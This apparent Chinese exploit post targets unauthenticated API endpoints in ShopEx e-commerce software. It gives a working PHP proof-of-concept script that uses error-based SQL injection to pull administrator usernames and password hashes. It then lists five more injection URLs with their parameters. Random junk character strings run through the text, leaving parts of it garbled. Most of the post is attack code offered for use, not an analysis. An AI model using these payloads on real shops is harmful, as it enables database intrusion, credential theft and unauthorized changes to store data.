: w# L/ ^/ \# Y6 L第44行 $data['columns'] 未做过滤导致注入 . A. p5 k1 L: w, f+ X$ Z4 A( U( Q( m/ q
<?php set_time_limit(0); ob_flush(); echo 'Test: http://localhost:808'."\r\n"; $sql = 'columns=* from sdb_payment_cfg WHERE 1 and (select 1 from(select count(*),concat((select (select (SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&disabled=1'; $url='http://localhost:808/api.php?act=search_payment_cfg_list&api_version=2.0'; $ch = curl_init(); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_POSTFIELDS, $sql); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); flush(); $data = curl_exec($ch); echo $data; curl_close($ch); ?>外带一句 ShopEx对API操作的模块未做认证,任何用户都可访问,攻击者可通过它来对产品的分类,类型,规格,品牌等,进行添加,删除和修改,过滤不当还可造成注入.7 j- r5 ~+ |5 b/ j, K' I
' G) H5 e1 S! l; Y) v- A
注射1: 4 h6 w6 K S+ A7 p, H" b( J. _0 v2 k, A; j7 X* F/ R http://www.0day5.com/api.php POST act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)# 1 r. z% O* s ~' N- N" h & j8 S# n( C& |! o) j h# Q. `9 i8 u注射2:: P1 Q! M- \0 K- L http://www.0day5.com/shopex/api.php act=add_category&api_version=3.1&datas={"name":"name' and 1=x %23"}) Y; l% ?* M/ o
7 g' e+ l) L8 p) j
注射3:3 M; u! l& D s V/ B http://www.0day5.com/shopex/api.php act=get_spec_single&api_version=3.1&spec_id=1 xxx- |7 e0 x% M s8 x. P* H& B: A
注射4:5 G' h8 J/ e6 i+ a; P- x' N- A
0 Y& Y( _! t3 S8 H) [! u! o S3 vhttp://www.0day5.com/shopex/api.php act=online_pay_center&api_version=1.0&order_id=1x&pay_id=1¤cy=14 v( i; s- Y* p k$ t
$ U! P1 Y$ V: C/ N5 O; X( H1 G9 h- C' t: Q- r8 ^6 f
注射5: 5 {8 [- e$ {5 W* `$ Z' phttp://www.0day5.com/shopex/api.php act=search_dly_h_area&return_data=string&columns=xxxxx2 y7 ]) y! {% j: o k" W
* g4 j/ h! P. g
: f4 y1 K$ a. W: g7 s0 p0 f
& b0 U% B v; W# n; R
3 K. J6 M* l+ d4 l, L5 o( A. a. D! U! }
. R7 X7 |+ ~! r0 e4 A